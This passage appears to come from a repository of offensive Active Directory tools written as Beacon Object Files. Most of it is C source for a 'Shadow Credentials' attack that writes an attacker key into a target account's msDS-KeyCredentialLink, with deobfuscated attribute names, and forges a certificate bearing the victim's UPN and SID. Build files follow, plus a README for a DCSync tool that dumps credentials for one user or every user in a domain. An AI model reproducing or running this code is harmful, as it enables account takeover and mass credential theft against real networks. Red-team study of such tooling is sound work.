    WCHAR* wszValue = (WCHAR*)malloc((32 + hexLen + wcslen(wszTargetDN) + 1) * sizeof(WCHAR));
    WCHAR* strVals[2];
    if (!wszValue) {
        ldap_unbind(pLdap);
        free(wszDomain);
        return FALSE;
    }

    /* Build DNWithBinary string */
    SWPRINTF(wszValue, L"B:%d:", hexLen);
    int pos = (int)wcslen(wszValue);
    int i;
    for (i = 0; i < blobLen; i++) {
        SWPRINTF(wszValue + pos + i * 2, L"%02X", keyCredBlob[i]);
    }
    wcscat(wszValue, L":");
    wcscat(wszValue, wszTargetDN);

    /* Use string values, not binary */
    strVals[0] = wszValue;
    strVals[1] = NULL;

    mod.mod_op = LDAP_MOD_ADD;
    mod.mod_type = wszKeyCredLink;  /* Use deobfuscated attribute name */
    mod.mod_vals.modv_strvals = strVals;

    mods[0] = &mod;
    mods[1] = NULL;

    ulResult = ldap_modify_sW(pLdap, wszTargetDN, mods);
    if (ulResult == LDAP_SUCCESS) {
        bSuccess = TRUE;
        /* Save the value for later cleanup */
        int valLen = (int)wcslen(wszValue) + 1;
        g_wszKeyCredValue = (WCHAR*)malloc(valLen * sizeof(WCHAR));
        if (g_wszKeyCredValue) {
            wcscpy(g_wszKeyCredValue, wszValue);
        }
    }
    else {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] ldap_modify_s failed: %u", ulResult);
    }

    ldap_unbind(pLdap);
    free(wszValue);
    free(wszDomain);
    return bSuccess;
}

static BOOL DeleteKeyCredentialLink(const char* szDomain, WCHAR* wszTargetDN) {
    LDAP* pLdap = NULL;
    WCHAR* wszDomain = NULL;
    LDAPModW* mods[2];
    LDAPModW mod;
    ULONG ulResult;
    BOOL bSuccess = FALSE;
    ULONG ulOff = 0;
    WCHAR wszSamAccountName[32];
    WCHAR wszDistinguishedName[32];
    WCHAR wszObjectSid[16];
    WCHAR wszKeyCredLink[32];

    if (!g_wszKeyCredValue) {
        return FALSE;
    }

    /* Deobfuscate attribute name */
    GetObfuscatedStrings(wszSamAccountName, wszDistinguishedName, wszObjectSid, wszKeyCredLink);

    wszDomain = (WCHAR*)malloc(256 * sizeof(WCHAR));
    if (!wszDomain) return FALSE;

    MultiByteToWideChar(CP_UTF8, 0, szDomain, -1, wszDomain, 256);

    pLdap = ldap_initW(wszDomain, LDAP_PORT);
    if (!pLdap) {
        free(wszDomain);
        return FALSE;
    }

    ulOff = 0;
    ldap_set_optionW(pLdap, LDAP_OPT_REFERRALS, &ulOff);

    ulResult = ldap_bind_sW(pLdap, NULL, NULL, LDAP_AUTH_NEGOTIATE);
    if (ulResult != LDAP_SUCCESS) {
        ldap_unbind(pLdap);
        free(wszDomain);
        return FALSE;
    }

    /* Use the saved value for deletion */
    WCHAR* strVals[2];
    strVals[0] = g_wszKeyCredValue;
    strVals[1] = NULL;

    mod.mod_op = LDAP_MOD_DELETE;
    mod.mod_type = wszKeyCredLink;
    mod.mod_vals.modv_strvals = strVals;

    mods[0] = &mod;
    mods[1] = NULL;

    ulResult = ldap_modify_sW(pLdap, wszTargetDN, mods);
    if (ulResult == LDAP_SUCCESS) {
        bSuccess = TRUE;
    }

    ldap_unbind(pLdap);
    free(wszDomain);
    return bSuccess;
}

static BOOL ClearKeyCredentialLink(const char* szDomain, WCHAR* wszTargetDN) {
    LDAP* pLdap = NULL;
    WCHAR* wszDomain = NULL;
    LDAPModW* mods[2];
    LDAPModW mod;
    ULONG ulResult;
    BOOL bSuccess = FALSE;
    ULONG ulOff = 0;
    WCHAR wszSamAccountName[32];
    WCHAR wszDistinguishedName[32];
    WCHAR wszObjectSid[16];
    WCHAR wszKeyCredLink[32];

    /* Deobfuscate attribute name */
    GetObfuscatedStrings(wszSamAccountName, wszDistinguishedName, wszObjectSid, wszKeyCredLink);

    wszDomain = (WCHAR*)malloc(256 * sizeof(WCHAR));
    if (!wszDomain) return FALSE;

    MultiByteToWideChar(CP_UTF8, 0, szDomain, -1, wszDomain, 256);

    pLdap = ldap_initW(wszDomain, LDAP_PORT);
    if (!pLdap) {
        free(wszDomain);
        return FALSE;
    }

    ulOff = 0;
    ldap_set_optionW(pLdap, LDAP_OPT_REFERRALS, &ulOff);

    ulResult = ldap_bind_sW(pLdap, NULL, NULL, LDAP_AUTH_NEGOTIATE);
    if (ulResult != LDAP_SUCCESS) {
        ldap_unbind(pLdap);
        free(wszDomain);
        return FALSE;
    }

    /* Clear all values by using LDAP_MOD_REPLACE with NULL */
    WCHAR* strVals[1];
    strVals[0] = NULL;

    mod.mod_op = LDAP_MOD_REPLACE;
    mod.mod_type = wszKeyCredLink;
    mod.mod_vals.modv_strvals = strVals;

    mods[0] = &mod;
    mods[1] = NULL;

    ulResult = ldap_modify_sW(pLdap, wszTargetDN, mods);
    if (ulResult == LDAP_SUCCESS) {
        bSuccess = TRUE;
    }

    ldap_unbind(pLdap);
    free(wszDomain);
    return bSuccess;
}

/*
 * =============================================================================
 * Certificate Generation with UPN SAN
 * =============================================================================
 */

 /* Forward declaration */
static BYTE* BuildCertificateWithKey(HCRYPTPROV hProv, HCRYPTKEY hKey, const char* szCN,
    const char* szUPN, const char* szSID, WCHAR* wszContainerName,
    int* certLen, int* pfxLen);

static BYTE* GenerateCertificateAndKey(const char* szCN, const char* szDomain, const char* szSID,
    BYTE** ppPublicKey, int* pPublicKeyLen,
    BYTE** ppPfx, int* pPfxLen, GUID* pDeviceId) {
    HCRYPTPROV hProv = 0;
    HCRYPTKEY hKey = 0;
    WCHAR wszContainerName[64];
    BYTE* publicKey = NULL;
    BYTE* certData = NULL;
    int certLen = 0;
    char szUPN[256];

    /* Generate container name */
    CoCreateGuid(pDeviceId);
    SWPRINTF(wszContainerName, L"ShadowCred_%08X%04X", pDeviceId->Data1, pDeviceId->Data2);

    /* Create crypto context */
    if (!CryptAcquireContextW(&hProv, wszContainerName, MS_ENHANCED_PROV_W, PROV_RSA_FULL, CRYPT_NEWKEYSET)) {
        if (GetLastError() == NTE_EXISTS) {
            if (!CryptAcquireContextW(&hProv, wszContainerName, MS_ENHANCED_PROV_W, PROV_RSA_FULL, 0)) {
                BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptAcquireContextW failed: 0x%08X", GetLastError());
                return NULL;
            }
        }
        else {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptAcquireContextW failed: 0x%08X", GetLastError());
            return NULL;
        }
    }

    /* Generate 2048-bit RSA key */
    if (!CryptGenKey(hProv, AT_KEYEXCHANGE, (2048 << 16) | CRYPT_EXPORTABLE, &hKey)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptGenKey failed: 0x%08X", GetLastError());
        CryptReleaseContext(hProv, 0);
        return NULL;
    }

    /* Export public key in BCRYPT format */
    publicKey = ExportRSAPublicKeyBCrypt(hKey, pPublicKeyLen);
    if (!publicKey) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to export public key");
        CryptDestroyKey(hKey);
        CryptReleaseContext(hProv, 0);
        return NULL;
    }
    *ppPublicKey = publicKey;

    /* Build UPN */
    sprintf(szUPN, "%s@%s", szCN, szDomain);

    /* Generate certificate with UPN SAN */
    certData = BuildCertificateWithKey(hProv, hKey, szCN, szUPN, szSID, wszContainerName, &certLen, pPfxLen);
    *ppPfx = certData;

    CryptDestroyKey(hKey);
    /* Don't release context - needed for certificate operations */

    return publicKey;
}

/*
 * =============================================================================
 * Certificate Building with Extensions
 * =============================================================================
 */

static BYTE* BuildCertificateWithKey(HCRYPTPROV hProv, HCRYPTKEY hKey, const char* szCN,
    const char* szUPN, const char* szSID, WCHAR* wszContainerName,
    int* certLen, int* pfxLen) {
    BYTE* pbSubject = NULL;
    DWORD cbSubject = 0;
    char szSubjectCN[256];
    BYTE* pbEncodedUPN = NULL;
    DWORD cbEncodedUPN = 0;
    CERT_OTHER_NAME otherName;
    CERT_ALT_NAME_ENTRY altNameEntries[2];
    CERT_ALT_NAME_INFO altNameInfo;
    DWORD dwAltNameCount = 1;
    BYTE* pbEncodedSAN = NULL;
    DWORD cbEncodedSAN = 0;
    CERT_EXTENSION extensions[1];
    DWORD extCount = 0;
    CERT_PUBLIC_KEY_INFO* pPubKeyInfo = NULL;
    DWORD dwPubKeyInfoLen = 0;
    CRYPT_ALGORITHM_IDENTIFIER sigAlgo;
    BYTE* pbEncodedCert = NULL;
    DWORD cbEncodedCert = 0;
    CERT_INFO certInfo;
    SYSTEMTIME stNow, stExpire;
    HCERTSTORE hMemStore = NULL;
    PCCERT_CONTEXT pCertContext = NULL;
    CRYPT_KEY_PROV_INFO keyProvInfo;
    CRYPT_DATA_BLOB pfxBlob;
    BYTE* resultPfx = NULL;
    static WCHAR wszSidUrl[256];

    memset(altNameEntries, 0, sizeof(altNameEntries));
    memset(&altNameInfo, 0, sizeof(altNameInfo));
    memset(&certInfo, 0, sizeof(certInfo));
    memset(&keyProvInfo, 0, sizeof(keyProvInfo));
    memset(&pfxBlob, 0, sizeof(pfxBlob));
    memset(&sigAlgo, 0, sizeof(sigAlgo));

    /* Build subject DN */
    sprintf(szSubjectCN, "CN=%s", szCN);
    if (!CertStrToNameA(X509_ASN_ENCODING, szSubjectCN, CERT_X500_NAME_STR, NULL, NULL, &cbSubject, NULL)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CertStrToNameA size failed");
        return NULL;
    }
    pbSubject = (BYTE*)malloc(cbSubject);
    if (!CertStrToNameA(X509_ASN_ENCODING, szSubjectCN, CERT_X500_NAME_STR, NULL, pbSubject, &cbSubject, NULL)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CertStrToNameA failed");
        free(pbSubject);
        return NULL;
    }

    /* Build SAN extension with UPN */
    {
        DWORD upnLen = (DWORD)strlen(szUPN);
        DWORD totalLen = (upnLen < 128) ? (2 + upnLen) : (4 + upnLen);
        BYTE* p;

        cbEncodedUPN = totalLen;
        pbEncodedUPN = (BYTE*)malloc(cbEncodedUPN);
        p = pbEncodedUPN;
        *p++ = 0x0C;  /* UTF8String */
        if (upnLen < 128) {
            *p++ = (BYTE)upnLen;
        }
        else {
            *p++ = 0x82;
            *p++ = (BYTE)(upnLen >> 8);
            *p++ = (BYTE)(upnLen & 0xFF);
        }
        memcpy(p, szUPN, upnLen);
    }

    otherName.pszObjId = (LPSTR)szOID_NT_PRINCIPAL_NAME;
    otherName.Value.cbData = cbEncodedUPN;
    otherName.Value.pbData = pbEncodedUPN;

    altNameEntries[0].dwAltNameChoice = CERT_ALT_NAME_OTHER_NAME;
    altNameEntries[0].pOtherName = &otherName;
    dwAltNameCount = 1;

    /* Add SID URL for KB5014754 strong mapping if provided */
    if (szSID && szSID[0]) {
        char szSidUrl[256];
        sprintf(szSidUrl, "tag:microsoft.com,2022-09-14:sid:%s", szSID);
        MultiByteToWideChar(CP_UTF8, 0, szSidUrl, -1, wszSidUrl, 256);

        altNameEntries[1].dwAltNameChoice = CERT_ALT_NAME_URL;
        altNameEntries[1].pwszURL = wszSidUrl;
        dwAltNameCount = 2;
    }

    altNameInfo.cAltEntry = dwAltNameCount;
    altNameInfo.rgAltEntry = altNameEntries;

    if (!CryptEncodeObjectEx(X509_ASN_ENCODING, szOID_SUBJECT_ALT_NAME2, &altNameInfo,
        CRYPT_ENCODE_ALLOC_FLAG, NULL, &pbEncodedSAN, &cbEncodedSAN)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to encode SAN: 0x%08X", GetLastError());
        free(pbSubject);
        free(pbEncodedUPN);
        return NULL;
    }

    extensions[extCount].pszObjId = (LPSTR)szOID_SUBJECT_ALT_NAME2;
    extensions[extCount].fCritical = FALSE;
    extensions[extCount].Value.cbData = cbEncodedSAN;
    extensions[extCount].Value.pbData = pbEncodedSAN;
    extCount++;

    /* Get public key info */
    CryptExportPublicKeyInfo(hProv, AT_KEYEXCHANGE, X509_ASN_ENCODING, NULL, &dwPubKeyInfoLen);
    pPubKeyInfo = (CERT_PUBLIC_KEY_INFO*)malloc(dwPubKeyInfoLen);
    if (!CryptExportPublicKeyInfo(hProv, AT_KEYEXCHANGE, X509_ASN_ENCODING, pPubKeyInfo, &dwPubKeyInfoLen)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptExportPublicKeyInfo failed");
        goto cleanup;
    }

    /* Build certificate info */
    GetSystemTime(&stNow);
    stExpire = stNow;
    stExpire.wYear += 1;

    certInfo.dwVersion = CERT_V3;
    certInfo.SerialNumber.cbData = 16;
    certInfo.SerialNumber.pbData = (BYTE*)malloc(16);
    CryptGenRandom(hProv, 16, certInfo.SerialNumber.pbData);

    sigAlgo.pszObjId = (LPSTR)szOID_RSA_SHA256RSA;
    certInfo.SignatureAlgorithm = sigAlgo;

    certInfo.Issuer.cbData = cbSubject;
    certInfo.Issuer.pbData = pbSubject;

    SystemTimeToFileTime(&stNow, &certInfo.NotBefore);
    SystemTimeToFileTime(&stExpire, &certInfo.NotAfter);

    certInfo.Subject.cbData = cbSubject;
    certInfo.Subject.pbData = pbSubject;

    certInfo.SubjectPublicKeyInfo = *pPubKeyInfo;

    certInfo.cExtension = extCount;
    certInfo.rgExtension = extensions;

    /* Sign and encode certificate */
    if (!CryptSignAndEncodeCertificate(hProv, AT_KEYEXCHANGE, X509_ASN_ENCODING,
        X509_CERT_TO_BE_SIGNED, &certInfo, &sigAlgo,
        NULL, NULL, &cbEncodedCert)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptSignAndEncodeCertificate size failed: 0x%08X", GetLastError());
        goto cleanup;
    }

    pbEncodedCert = (BYTE*)malloc(cbEncodedCert);
    if (!CryptSignAndEncodeCertificate(hProv, AT_KEYEXCHANGE, X509_ASN_ENCODING,
        X509_CERT_TO_BE_SIGNED, &certInfo, &sigAlgo,
        NULL, pbEncodedCert, &cbEncodedCert)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptSignAndEncodeCertificate failed: 0x%08X", GetLastError());
        goto cleanup;
    }

    *certLen = cbEncodedCert;

    /* Create memory store and add certificate */
    hMemStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL);
    if (!hMemStore) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CertOpenStore failed");
        goto cleanup;
    }

    pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING, pbEncodedCert, cbEncodedCert);
    if (!pCertContext) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CertCreateCertificateContext failed");
        goto cleanup;
    }

    /* Add cert to store first, then associate private key with the store copy */
    {
        PCCERT_CONTEXT pStoreCert = NULL;
        if (!CertAddCertificateContextToStore(hMemStore, pCertContext, CERT_STORE_ADD_ALWAYS, &pStoreCert)) {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] CertAddCertificateContextToStore failed");
            goto cleanup;
        }

        /* Associate private key with the container name we created */
        keyProvInfo.pwszContainerName = wszContainerName;  /* Use the container name from key generation */
        keyProvInfo.pwszProvName = MS_ENHANCED_PROV_W;
        keyProvInfo.dwProvType = PROV_RSA_FULL;
        keyProvInfo.dwFlags = 0;
        keyProvInfo.cProvParam = 0;
        keyProvInfo.rgProvParam = NULL;
        keyProvInfo.dwKeySpec = AT_KEYEXCHANGE;

        if (!CertSetCertificateContextProperty(pStoreCert, CERT_KEY_PROV_INFO_PROP_ID, 0, &keyProvInfo)) {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] CertSetCertificateContextProperty failed: 0x%08X", GetLastError());
        }

        CertFreeCertificateContext(pStoreCert);
    }

    /* Export to PFX */
    pfxBlob.pbData = NULL;
    pfxBlob.cbData = 0;

    if (!PFXExportCertStoreEx(hMemStore, &pfxBlob, L"", NULL, EXPORT_PRIVATE_KEYS)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] PFXExportCertStoreEx size failed");
        goto cleanup;
    }

    pfxBlob.pbData = (BYTE*)malloc(pfxBlob.cbData);
    if (!PFXExportCertStoreEx(hMemStore, &pfxBlob, L"", NULL, EXPORT_PRIVATE_KEYS)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] PFXExportCertStoreEx failed");
        goto cleanup;
    }

    *pfxLen = pfxBlob.cbData;
    resultPfx = pfxBlob.pbData;

cleanup:
    if (certInfo.SerialNumber.pbData) free(certInfo.SerialNumber.pbData);
    if (pbSubject) free(pbSubject);
    if (pbEncodedUPN) free(pbEncodedUPN);
    if (pbEncodedSAN) LocalFree(pbEncodedSAN);
    if (pPubKeyInfo) free(pPubKeyInfo);
    if (pbEncodedCert && !resultPfx) free(pbEncodedCert);
    if (pCertContext) CertFreeCertificateContext(pCertContext);
    if (hMemStore) CertCloseStore(hMemStore, 0);
    /* Don't free keyProvInfo.pwszContainerName - it points to caller's buffer */

    return resultPfx;
}

void go(char* args, int alen)
{
    char* szTarget = NULL;
    char* szDomain = NULL;
    WCHAR wszTargetDN[512] = { 0 };
    BYTE* pbUserSID = NULL;
    DWORD dwUserSIDLen = 0;
    char szSIDString[128] = { 0 };
    BYTE* pbPublicKey = NULL;
    int nPublicKeyLen = 0;
    BYTE* pbPfx = NULL;
    int nPfxLen = 0;
    BYTE* pbKeyCredBlob = NULL;
    int nKeyCredBlobLen = 0;
    GUID deviceId;
    short bNoWrite = 0;
    short bClear = 0;
    char domainBuf[256] = {0};

    /* Parse arguments */
    datap parser;
    BeaconDataParse(&parser, args, alen);
    szTarget = BeaconDataExtract(&parser, NULL);
    szDomain = BeaconDataExtract(&parser, NULL);
    bNoWrite = BeaconDataShort(&parser);
    bClear   = BeaconDataShort(&parser);

    if (!szTarget || !szTarget[0]) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Usage: certi_shadow --target <user> [--domain <domain>]");
        return;
    }

    /* Auto-detect domain if not provided */
    if (!szDomain || !szDomain[0]) {
        WCHAR wszDomain[256] = {0};
        DWORD dwSize = 256;
        /* ComputerNameDnsDomain = 2 */
        if (GetComputerNameExW(2, wszDomain, &dwSize) && wszDomain[0]) {
            WideCharToMultiByte(CP_UTF8, 0, wszDomain, -1, domainBuf, sizeof(domainBuf), NULL, NULL);
            szDomain = domainBuf;
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Auto-detected domain: %s", szDomain);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to auto-detect domain. Please specify --domain");
            return;
        }
    }

    if (bClear) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Clearing Shadow Credentials: %s@%s", szTarget, szDomain);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Shadow Credentials: %s@%s", szTarget, szDomain);
    }

    /* Save domain for cleanup */
    {
        int di;
        for (di = 0; di < 255 && szDomain[di]; di++) {
            g_szDomain[di] = szDomain[di];
        }
        g_szDomain[di] = '\0';
    }

    /* Initialize COM */
    CoInitializeEx(NULL, 0);

    /* Step 1: Lookup target DN and SID */
    if (!LookupUserDNAndSID(szTarget, szDomain, wszTargetDN, 512, &pbUserSID, &dwUserSIDLen)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to lookup target");
        goto cleanup;
    }

    /* Save target DN for cleanup */
    wcscpy(g_wszTargetDN, wszTargetDN);

    /* If --clear mode, just clear and exit */
    if (bClear) {
        if (ClearKeyCredentialLink(szDomain, wszTargetDN)) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] msDS-KeyCredentialLink cleared successfully!");
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to clear msDS-KeyCredentialLink");
        }
        goto cleanup;
    }

    /* Convert SID to string for certificate */
    if (pbUserSID && dwUserSIDLen > 0) {
        LPSTR pszSid = NULL;
        if (ConvertSidToStringSidA((PSID)pbUserSID, &pszSid)) {
            strcpy(szSIDString, pszSid);
            LocalFree(pszSid);
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Target SID: %s", szSIDString);
        }
    }

    /* Step 2: Generate keypair and certificate */
    if (!GenerateCertificateAndKey(szTarget, szDomain, szSIDString,
        &pbPublicKey, &nPublicKeyLen,
        &pbPfx, &nPfxLen, &deviceId)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to generate certificate");
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Generated RSA keypair (2048-bit)");

    /* Save device ID for display */
    memcpy(&g_deviceId, &deviceId, sizeof(GUID));

    /* Step 3: Build KeyCredential blob */
    pbKeyCredBlob = BuildKeyCredentialBlob(pbPublicKey, nPublicKeyLen, &deviceId, &nKeyCredBlobLen);
    if (!pbKeyCredBlob) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build KeyCredential blob");
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Built KeyCredential blob");

    /* Step 4: Write to msDS-KeyCredentialLink (unless --no-write) */
    if (!bNoWrite) {
        if (!WriteKeyCredentialLink(szDomain, wszTargetDN, pbKeyCredBlob, nKeyCredBlobLen)) {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to write msDS-KeyCredentialLink");
            BeaconPrintf(CALLBACK_OUTPUT, "[!] You may need GenericWrite/GenericAll on target");
            goto cleanup;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Wrote msDS-KeyCredentialLink successfully!");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Skipping msDS-KeyCredentialLink write (--no-write)");
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] DeviceID: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",
        deviceId.Data1, deviceId.Data2, deviceId.Data3,
        deviceId.Data4[0], deviceId.Data4[1], deviceId.Data4[2], deviceId.Data4[3],
        deviceId.Data4[4], deviceId.Data4[5], deviceId.Data4[6], deviceId.Data4[7]);

    /* Step 5: Output PFX */
    {
        DWORD b64Len = 0;
        CryptBinaryToStringA(pbPfx, nPfxLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &b64Len);
        char* b64 = (char*)malloc(b64Len + 1);
        CryptBinaryToStringA(pbPfx, nPfxLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64, &b64Len);

        BeaconPrintf(CALLBACK_OUTPUT, "[+] PFX (base64, no password):\n\n%s\n", b64);

        free(b64);
    }

cleanup:
    if (pbUserSID) free(pbUserSID);
    if (pbPublicKey) free(pbPublicKey);
    if (pbPfx) free(pbPfx);
    if (pbKeyCredBlob) free(pbKeyCredBlob);

    CoUninitialize();
}


================================================
FILE: AD-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(AD-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories
include_directories(
    ${CMAKE_SOURCE_DIR}/_include
#    ${CMAKE_CURRENT_SOURCE_DIR}/Kerbeus-BOF/_include
#    ${CMAKE_CURRENT_SOURCE_DIR}/SQL-BOF/common
#    ${CMAKE_CURRENT_SOURCE_DIR}/LDAP-BOF/_include
#    ${CMAKE_CURRENT_SOURCE_DIR}/LDAP-BOF/src/common
)

# Source files
set(LDAPSEARCH_SOURCES ldapsearch/ldapsearch.c)
set(ADWSSEARCH_SOURCES adwssearch/adws_search.c)
set(READLAPS_SOURCES readlaps/readlaps.c)
set(BADTAKEOVER_SOURCES badtakeover/BadTakeover.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -masm=intel -DBOF")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(ldapsearch OBJECT ${LDAPSEARCH_SOURCES})
add_library(adws_search OBJECT ${ADWSSEARCH_SOURCES})
add_library(readlaps OBJECT ${READLAPS_SOURCES})

# BadTakeover with special flags
add_library(badtakeover OBJECT ${BADTAKEOVER_SOURCES})
target_compile_options(badtakeover PRIVATE
    -fno-asynchronous-unwind-tables
    -nostdlib
    -fno-ident
    -fpack-struct=8
    -falign-functions=1
    -ffunction-sections
    -falign-jumps=1
    -Wall
)

# Subdirectories
# add_subdirectory(ADCS-BOF)
add_subdirectory(Kerbeus-BOF)
add_subdirectory(SQL-BOF)
add_subdirectory(LDAP-BOF)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom targets to copy object files to _bin (using custom_target instead of custom_command for OBJECT libraries)
add_custom_target(copy_ldapsearch ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:ldapsearch> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/ldapsearch.x64.o
    DEPENDS ldapsearch
    COMMENT "Copying ldapsearch object file"
)

add_custom_target(copy_adws_search ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:adws_search> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/adws_search.x64.o
    DEPENDS adws_search
    COMMENT "Copying adws_search object file"
)

add_custom_target(copy_readlaps ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:readlaps> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/readlaps.x64.o
    DEPENDS readlaps
    COMMENT "Copying readlaps object file"
)

add_custom_target(copy_badtakeover ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:badtakeover> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/badtakeover.x64.o
    DEPENDS badtakeover
    COMMENT "Copying badtakeover object file"
)


================================================
FILE: AD-BOF/DCSync-BOF/LICENSE
================================================
MIT License

Copyright (c) 2025 Polar

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


================================================
FILE: AD-BOF/DCSync-BOF/Makefile
================================================
CC = x86_64-w64-mingw32-gcc
LD = x86_64-w64-mingw32-ld
STRIP = x86_64-w64-mingw32-strip

CFLAGS_BASE = -I. -Os -masm=intel -fno-stack-protector -mno-stack-arg-probe -DBOF -Wall -Wno-format -D_M_AMD64 -Wno-unused-variable -Wno-unknown-pragmas -Wno-missing-braces -Wno-builtin-macro-redefined
CFLAGS_RELEASE = $(CFLAGS_BASE) -DNDEBUG
LDFLAGS = -r

CFLAGS = $(CFLAGS_RELEASE)
RPC_STUB = drsuapi/ms-drsr-custom.c

all: both

both: clean single-user all-users

single-user: CFLAGS = $(CFLAGS_RELEASE)
single-user: RPC_STUB = drsuapi/ms-drsr-custom.c
single-user: SRC_FILE = src/dcsync-single.c
single-user: bof-single
	@echo '[+] dcsync single'

all-users: CFLAGS = $(CFLAGS_RELEASE)
all-users: RPC_STUB = drsuapi/ms-drsr-custom.c
all-users: SRC_FILE = src/dcsync-all.c
all-users: bof-all
	@echo '[+] dcsync all'

bof-single:
	@[ -d "_bin" ] || { mkdir -p "_bin"; }
	@$(CC) $(CFLAGS) -c util/rpc-adapter.c -o _bin/rpc-adapter-single.o
	@$(CC) $(CFLAGS) -c $(RPC_STUB) -o _bin/ms-drsr_c-single.o
	@$(CC) $(CFLAGS) -c $(SRC_FILE) -o _bin/dcsync-single-temp.o
	@$(LD) $(LDFLAGS) _bin/rpc-adapter-single.o _bin/ms-drsr_c-single.o _bin/dcsync-single-temp.o -o _bin/dcsync-single.x64.o
	@$(STRIP) --strip-unneeded _bin/dcsync-single.x64.o
	@rm -f _bin/rpc-adapter-single.o _bin/ms-drsr_c-single.o _bin/dcsync-single-temp.o

bof-all:
	@[ -d "_bin" ] || { mkdir -p "_bin"; }
	@$(CC) $(CFLAGS) -c util/rpc-adapter.c -o _bin/rpc-adapter-all.o
	@$(CC) $(CFLAGS) -c $(RPC_STUB) -o _bin/ms-drsr_c-all.o
	@$(CC) $(CFLAGS) -c $(SRC_FILE) -o _bin/dcsync-all-temp.o
	@$(LD) $(LDFLAGS) _bin/rpc-adapter-all.o _bin/ms-drsr_c-all.o _bin/dcsync-all-temp.o -o _bin/dcsync-all.x64.o
	@$(STRIP) --strip-unneeded _bin/dcsync-all.x64.o
	@rm -f _bin/rpc-adapter-all.o _bin/ms-drsr_c-all.o _bin/dcsync-all-temp.o

clean:
	@rm -rf _bin



================================================
FILE: AD-BOF/DCSync-BOF/README.md
================================================
# DCSync BOF

A Beacon Object File (BOF) implementation of the DCSync attack for extracting credential material from Active Directory domain controllers.

### Features

- Single User Targeting - Extract credentials for a specific domain user
- Bulk Extraction - Dump all users from a domain or organizational unit
- Flexible LDAP Options - Support for custom DCs, OUs, and LDAPS connections

## Usage

### Command Reference

| Command   | Description                               | Usage                                                        |
|-----------|-------------------------------------------|--------------------------------------------------------------|
| `single`  | Extract credentials for a specific user   | `dcsync single <target> [-ou <path>] [-dc <fqdn>] [--ldaps]` |
| `all`     | Extract credentials for all domain users  | `dcsync all [-ou <path>] [-dc <fqdn>] [--ldaps]`             |

### Examples

Extract credentials for a single user:
```sh
dcsync single jane.doe
```

Search for target user in a specific OU using LDAPS:
```sh
dcsync single john.smith -ou "OU=Admins,DC=corp,DC=local" --ldaps
```

